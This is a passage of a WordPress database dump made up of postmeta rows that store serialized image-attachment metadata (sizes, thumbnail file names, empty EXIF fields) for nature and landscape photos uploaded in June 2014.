(686, 756, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:400;s:6:"height";i:267;s:4:"file";s:18:"2014/06/shell1.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"shell1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"shell1-300x200.jpg";s:5:"width";i:300;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:18:"shell1-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:18:"shell1-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(696, 877, '_wp_attached_file', '2014/06/praying-to-Sol.jpg'),
(697, 877, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:638;s:6:"height";i:850;s:4:"file";s:26:"2014/06/praying-to-Sol.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"praying-to-Sol-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:26:"praying-to-Sol-225x300.jpg";s:5:"width";i:225;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:26:"praying-to-Sol-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:26:"praying-to-Sol-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:26:"praying-to-Sol-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:26:"praying-to-Sol-638x372.jpg";s:5:"width";i:638;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:26:"praying-to-Sol-638x576.jpg";s:5:"width";i:638;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(698, 915, '_edit_lock', '1417565819:2'),
(699, 915, '_edit_last', '1'),
(700, 915, '_wp_page_template', 'default'),
(709, 936, '_edit_lock', '1404350805:1'),
(710, 936, '_edit_last', '1'),
(711, 936, '_wp_page_template', 'default'),
(712, 955, '_wp_attached_file', '2014/06/annular-solar-eclipse-5-12-New-Mexico.jpg'),
(713, 955, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:960;s:6:"height";i:720;s:4:"file";s:49:"2014/06/annular-solar-eclipse-5-12-New-Mexico.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:49:"annular-solar-eclipse-5-12-New-Mexico-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:49:"annular-solar-eclipse-5-12-New-Mexico-300x225.jpg";s:5:"width";i:300;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:49:"annular-solar-eclipse-5-12-New-Mexico-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:49:"annular-solar-eclipse-5-12-New-Mexico-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:49:"annular-solar-eclipse-5-12-New-Mexico-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:49:"annular-solar-eclipse-5-12-New-Mexico-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:49:"annular-solar-eclipse-5-12-New-Mexico-960x576.jpg";s:5:"width";i:960;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(714, 956, '_wp_attached_file', '2014/06/boat-on-spectacular-sunset.jpg'),
(715, 956, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:802;s:6:"height";i:960;s:4:"file";s:38:"2014/06/boat-on-spectacular-sunset.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"boat-on-spectacular-sunset-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"boat-on-spectacular-sunset-250x300.jpg";s:5:"width";i:250;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:38:"boat-on-spectacular-sunset-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:38:"boat-on-spectacular-sunset-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:38:"boat-on-spectacular-sunset-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:38:"boat-on-spectacular-sunset-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:38:"boat-on-spectacular-sunset-802x576.jpg";s:5:"width";i:802;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(716, 957, '_wp_attached_file', '2014/06/Brilliant-sunset-at-beach-by-Noko-Mis.jpg'),
(717, 957, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:960;s:6:"height";i:720;s:4:"file";s:49:"2014/06/Brilliant-sunset-at-beach-by-Noko-Mis.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:49:"Brilliant-sunset-at-beach-by-Noko-Mis-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:49:"Brilliant-sunset-at-beach-by-Noko-Mis-300x225.jpg";s:5:"width";i:300;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:49:"Brilliant-sunset-at-beach-by-Noko-Mis-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:49:"Brilliant-sunset-at-beach-by-Noko-Mis-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:49:"Brilliant-sunset-at-beach-by-Noko-Mis-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:49:"Brilliant-sunset-at-beach-by-Noko-Mis-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:49:"Brilliant-sunset-at-beach-by-Noko-Mis-960x576.jpg";s:5:"width";i:960;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(718, 958, '_wp_attached_file', '2014/06/dew-umbrella.jpg'),
(719, 958, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:480;s:6:"height";i:413;s:4:"file";s:24:"2014/06/dew-umbrella.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"dew-umbrella-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"dew-umbrella-300x258.jpg";s:5:"width";i:300;s:6:"height";i:258;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:24:"dew-umbrella-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:24:"dew-umbrella-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:24:"dew-umbrella-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:24:"dew-umbrella-480x372.jpg";s:5:"width";i:480;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(720, 959, '_wp_attached_file', '2014/06/gazania-flower-photograph.jpg'),
(721, 959, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:1000;s:6:"height";i:750;s:4:"file";s:37:"2014/06/gazania-flower-photograph.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:37:"gazania-flower-photograph-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:37:"gazania-flower-photograph-300x225.jpg";s:5:"width";i:300;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:37:"gazania-flower-photograph-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:37:"gazania-flower-photograph-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:37:"gazania-flower-photograph-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:37:"gazania-flower-photograph-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:38:"gazania-flower-photograph-1000x576.jpg";s:5:"width";i:1000;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(722, 960, '_wp_attached_file', '2014/06/Lenticular-5-layer-clouds-over-mtn.jpg'),
(723, 960, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:960;s:6:"height";i:660;s:4:"file";s:46:"2014/06/Lenticular-5-layer-clouds-over-mtn.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:46:"Lenticular-5-layer-clouds-over-mtn-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:46:"Lenticular-5-layer-clouds-over-mtn-300x206.jpg";s:5:"width";i:300;s:6:"height";i:206;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:46:"Lenticular-5-layer-clouds-over-mtn-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:46:"Lenticular-5-layer-clouds-over-mtn-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:46:"Lenticular-5-layer-clouds-over-mtn-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:46:"Lenticular-5-layer-clouds-over-mtn-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:46:"Lenticular-5-layer-clouds-over-mtn-960x576.jpg";s:5:"width";i:960;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(724, 961, '_wp_attached_file', '2014/06/Lenticular-clouds-over-Ranier.jpg'),
(725, 961, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:554;s:6:"height";i:443;s:4:"file";s:41:"2014/06/Lenticular-clouds-over-Ranier.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:41:"Lenticular-clouds-over-Ranier-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:41:"Lenticular-clouds-over-Ranier-300x239.jpg";s:5:"width";i:300;s:6:"height";i:239;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:41:"Lenticular-clouds-over-Ranier-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:41:"Lenticular-clouds-over-Ranier-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:41:"Lenticular-clouds-over-Ranier-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:41:"Lenticular-clouds-over-Ranier-554x372.jpg";s:5:"width";i:554;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(726, 962, '_wp_attached_file', '2014/06/lotus-flower-reflected.jpg'),
(727, 962, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:900;s:6:"height";i:675;s:4:"file";s:34:"2014/06/lotus-flower-reflected.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"lotus-flower-reflected-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"lotus-flower-reflected-300x225.jpg";s:5:"width";i:300;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:34:"lotus-flower-reflected-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:34:"lotus-flower-reflected-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:34:"lotus-flower-reflected-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:34:"lotus-flower-reflected-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:34:"lotus-flower-reflected-900x576.jpg";s:5:"width";i:900;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(728, 963, '_wp_attached_file', '2014/06/Magical-Beach.jpg'),
(729, 963, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:720;s:6:"height";i:485;s:4:"file";s:25:"2014/06/Magical-Beach.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"Magical-Beach-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"Magical-Beach-300x202.jpg";s:5:"width";i:300;s:6:"height";i:202;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:25:"Magical-Beach-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:25:"Magical-Beach-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:25:"Magical-Beach-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:25:"Magical-Beach-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(730, 964, '_wp_attached_file', '2014/06/Moon-through-Arches-National.jpg'),
(731, 964, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:792;s:6:"height";i:612;s:4:"file";s:40:"2014/06/Moon-through-Arches-National.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"Moon-through-Arches-National-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"Moon-through-Arches-National-300x231.jpg";s:5:"width";i:300;s:6:"height";i:231;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:40:"Moon-through-Arches-National-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:40:"Moon-through-Arches-National-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:40:"Moon-through-Arches-National-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:40:"Moon-through-Arches-National-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:40:"Moon-through-Arches-National-792x576.jpg";s:5:"width";i:792;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(732, 965, '_wp_attached_file', '2014/06/perfect-beach-scene.jpg'),
(733, 965, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:960;s:6:"height";i:768;s:4:"file";s:31:"2014/06/perfect-beach-scene.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"perfect-beach-scene-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"perfect-beach-scene-300x240.jpg";s:5:"width";i:300;s:6:"height";i:240;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:31:"perfect-beach-scene-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:31:"perfect-beach-scene-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:31:"perfect-beach-scene-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:31:"perfect-beach-scene-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:31:"perfect-beach-scene-960x576.jpg";s:5:"width";i:960;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(734, 966, '_wp_attached_file', '2014/06/piuva-tree-brazil-photograph.jpg'),
(735, 966, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:1000;s:6:"height";i:1138;s:4:"file";s:40:"2014/06/piuva-tree-brazil-photograph.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"piuva-tree-brazil-photograph-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"piuva-tree-brazil-photograph-263x300.jpg";s:5:"width";i:263;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"piuva-tree-brazil-photograph-899x1024.jpg";s:5:"width";i:899;s:6:"height";i:1024;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:40:"piuva-tree-brazil-photograph-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:40:"piuva-tree-brazil-photograph-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:40:"piuva-tree-brazil-photograph-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:40:"piuva-tree-brazil-photograph-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:41:"piuva-tree-brazil-photograph-1000x576.jpg";s:5:"width";i:1000;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(736, 967, '_wp_attached_file', '2014/06/Sea-Cave-Azores-Portugal.jpg'),
(737, 967, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:500;s:6:"height";i:667;s:4:"file";s:36:"2014/06/Sea-Cave-Azores-Portugal.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"Sea-Cave-Azores-Portugal-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"Sea-Cave-Azores-Portugal-224x300.jpg";s:5:"width";i:224;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:36:"Sea-Cave-Azores-Portugal-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:36:"Sea-Cave-Azores-Portugal-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:36:"Sea-Cave-Azores-Portugal-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:36:"Sea-Cave-Azores-Portugal-500x372.jpg";s:5:"width";i:500;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:36:"Sea-Cave-Azores-Portugal-500x576.jpg";s:5:"width";i:500;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(738, 968, '_wp_attached_file', '2014/06/sky-sun-cloud-radiance.jpg'),
(739, 968, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:2048;s:6:"height";i:1152;s:4:"file";s:34:"2014/06/sky-sun-cloud-radiance.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"sky-sun-cloud-radiance-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"sky-sun-cloud-radiance-300x168.jpg";s:5:"width";i:300;s:6:"height";i:168;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"sky-sun-cloud-radiance-1024x576.jpg";s:5:"width";i:1024;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:34:"sky-sun-cloud-radiance-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:34:"sky-sun-cloud-radiance-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:34:"sky-sun-cloud-radiance-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:34:"sky-sun-cloud-radiance-672x372.jpg";s:5:"width";i:672;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:35:"sky-sun-cloud-radiance-1038x576.jpg";s:5:"width";i:1038;s:6:"height";i:576;s:9:"mime-type";s:10: